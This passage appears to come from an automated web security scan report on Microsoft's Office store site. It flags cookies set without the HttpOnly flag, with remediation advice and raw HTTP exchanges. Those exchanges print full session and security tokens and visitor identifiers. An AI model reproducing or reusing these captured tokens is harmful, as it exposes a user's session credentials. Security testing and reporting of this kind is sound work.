User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://office.microsoft.com/en-us/office-home-and-student-FX101845698.aspx
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b476b6d6346654e564530766873524f455753676b665970464852784e70374b6e6e6b725732635731316a412f366a34784c6c2b2f5061705a6d52434153316c39553d; GT_COOKIE=3931209738.20480.0000

Response

HTTP/1.1 200 OK
Date: Fri, 28 Oct 2011 21:58:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:54 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:54 GMT; path=/
Vary: Accept-Encoding, User-Agent
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
   <head>
       
           <script language="Javascript">
               if (top != self)
               {
                       top.location =
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NDgzNDU1NmRk" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 7 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www2.buyoffice.microsoft.com/usa/basket.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/basket.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usa/basket.aspx?sku=10234422&cache=-1528400984&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&cmd=basket_additem&culture=en-us HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234528&cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828193563:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.NumberOfVisits=12&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D; C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; GT_COOKIE=3931209738.20480.0000; WT_NVR=0=/:1=usa; 72961245-VID=546022977410; 72961245-SKEY=501687361247658767; HumanClickSiteContainerID_72961245=STANDALONE

Response

HTTP/1.1 302 Found
Date: Fri, 28 Oct 2011 22:01:49 GMT
Content-Length: 266
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 22:01:49 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234422&cache=-1528400984&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 04:01:49 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.buyoffice.microsoft.com/usa/promotion.aspx?sku=10234422&amp;cache=-1528400984&amp;WT.mc_id=ODC_ENUS_OATHa
...[SNIP]...

3.2. http://www2.buyoffice.microsoft.com/usa/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usa/default.aspx?cmd=basket_additem&sku=10234528&WT%2Emc%5Fid=ODC%5FENUS%5FOATHandSHome%5FMonBuy HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://office.microsoft.com/en-us/office-home-and-student-FX101845698.aspx
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319827900464:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=150&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319838814543; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d0186394c; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c07225dd8a8797d2fa2976b3eee02dfd22e308028d85a8; Microsoft.com=SS_Url=http%3a%2f%2fsocial.msdn.microsoft.com%2fSearch%2fen-US%3fquery%3dxss+a%26ac%3d8%7e%7e10%2f09%2f2011+00%3a31%3a40&SS=282&SS_Refn_Incr=0; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b9f&W=1; NAP=V=1.9&E=b45&C=fwpnHGQ2X_czDvTIj3ESgREE63mN7SiurD-8ETgQspHQSOUuQ0Sfog&W=1; msdn=L=1033; _vis_opt_s=1%7C; os_user=17188018-6167-4B65-82BC-4D02642CD005; s_nr=1318119197856; MSPartner2=LogUser=947b4a2a-63b2-4cd1-85c2-3c6d7b51de02&RegUser=; UserState=Returning=True&LastVisit=10/09/2011 00:33:07&UserEBacExpression=+ 0|2 + 1|8 2|1024; CountryOfChoice=CountryCode=is-is; HasVisitedNGP=true; stFI=Fri%2C%2011%20Nov%202011%2012%3A48%3A45%20GMT; s_cc=true; s_sq=%5B%5BB%5D%5D; MS0=7a35318c7c364b848b7b561b51450cdd; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=cc08929e-ebd2-4709-8d5e-db238168f2ef&Microsoft.CreationDate=10/28/2011 21:47:35&Microsoft.LastVisitDate=10/28/2011 21:53:34&Microsoft.NumberOfVisits=9&SessionCookie.Id=7B7ADC61999EA28C6E1C9FDA77F4CD53; _opt_vi_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vs_06F86FDK=3628C5CE-BC8E-46C1-A0B7-8C768A4BFEEE; _opt_vt_06F86FDK=01E473567D

Response

HTTP/1.1 302 Found
Date: Fri, 28 Oct 2011 21:58:52 GMT
Content-Length: 245
Content-Type: text/html; charset=utf-8
Cache-Control: private
Set-Cookie: C5_SESSION_TOKEN=37494b4a533665526f635a69316e55776656434d4f4342796f4f72716f70684a4a477441775a725961654943516868476745625a2b6f73424e556879464555784733324961626e61574f7032504e6d4c4c514534302f52796f3141366877425a6d5262752b756b4d4e436c514f713878344578526f77615747676642656f534d4f386c5265667541546c676b4e5a7066506a42533734596966513869356f493831365052784b57376f616e584c545163794e3959517941597463414f416c664b436b584f696c324557545a39385935593263314150773d3d; expires=Sat, 29-Oct-2011 21:58:52 GMT; path=/
Set-Cookie: C5_SECURITY_TOKEN=36703262516d41613770364c574532544c7362523556356634646c344d2f5671465957372f336578304b4742763431676331696b4c676e694d6b4d6e486b52557367704a45554d544f50706a4670636f30795848366e6238663752396d4a597a6456416332764f6168336b5951786c2b663766735243325a4248706e41706e6a; path=/
Server: Microsoft-IIS/6.0
X-Server-Name: dc2gtweb04
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www2.buyoffice.microsoft.com/usa/basket.aspx?cache=1968341058&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Via: 1.1 DC2CACHE03 (NetCache NetApp/6.0.5)
Set-Cookie: GT_COOKIE=3931209738.20480.0000; expires=Sat, 29-Oct-2011 03:58:52 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www2.buyoffice.microsoft.com/usa/basket.aspx?cache=1968341058&amp;WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&amp;cu
...[SNIP]...

3.3. http://www2.buyoffice.microsoft.com/usa/gttracker.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www2.buyoffice.microsoft.com
Path:   /usa/gttracker.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /usa/gttracker.aspx?t=Mc6qIckwJwzKMkG4LT7xYuhAUP2DEgDwvC%2fzxOGTzRaDlBB69UyMGJZGNlO7AwXi HTTP/1.1
Host: www2.buyoffice.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www2.buyoffice.microsoft.com/usa/basket.aspx?cache=-1528400984&WT.mc_id=ODC_ENUS_OATHandSHome_MonBuy&culture=en-us
Cookie: WT_FPC=id=20b4a619ec15c9129a51311327259214:lv=1319828193563:ss=1319827656668; A=I&I=AxUFAAAAAAAKBwAAdXWUADhA25JSNVWis+tmhQ!!&GO=244&CS=127W[a00017Io0G02h7Io0G0021D400; MUID=360F843730F542A7A6E2E0ACB7BADB9D; MSID=Microsoft.CreationDate=07/22/2011 12:36:13&Microsoft.LastVisitDate=10/28/2011 21:58:48&Microsoft.VisitStartDate=10/28/2011 21:47:35&Microsoft.CookieId=ac11fa37-8f10-42d0-83ff-16cc26c7f5e7&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=153&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0385-6668-8006-3576; MC1=GUID=77ec6960d0e1ff40bfef8b0c56239b53&HASH=6069&LV=20117&V=3&LU=1319839128060; _opt_vi_RLWY7DRO=5D945FBB-6638-4BDF-A1AF-09A0EB00612A; _opt_vi_X19C7L9U=BF4B3FA2-8E51-4150-9ABB-1077225B50AC; _opt_vi_TKSBM7DI=9C480FCC-CBD9-4C4A-AD5E-8907629E985D; R=200022414-10/8/2011 19:24:36|200024632-10/7/2011 14:10:58|200011647-8/28/2011 4:18:41; fsr.r.365={"d":90,"i":"1312388639285_861091","e":1312993478247}; omniID=1312424649583_34bd_b414_dec7_f8046bff7d58; WT_NVR_RU=0=msdn|technet:1=MSDN&/:2=; s_vnum=1344034955534%26vn%3D7; ixpLightBrowser=1; mcI=Fri, 09 Sep 2011 11:39:38 GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1313683684143%7D%2C%22lastinvited%22%3A1313683684143%2C%22userid%22%3A%221313683684143979693397905030%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS_WT=ta_M={"Value":"{\"_wt.control-327131-ta_M\":{\"value\":\"{\\\"runid\\\":\\\"345246\\\",\\\"testid\\\":\\\"345238\\\",\\\"trackid\\\":\\\"345247\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_M-345246-345247\\\",\\\"uid\\\":\\\"4835653768079280752\\\",\\\"userSession\\\":\\\"1314456405421-13144564054213768\\\"}\"}}","Expires":"\/Date(1322232405420)\/"}&ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350162\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350162\\\",\\\"uid\\\":\\\"4837196762300854610\\\",\\\"userSession\\\":\\\"1314916107158-1314916017686388\\\"}\"}}","Expires":"\/Date(1322692109897)\/"}; 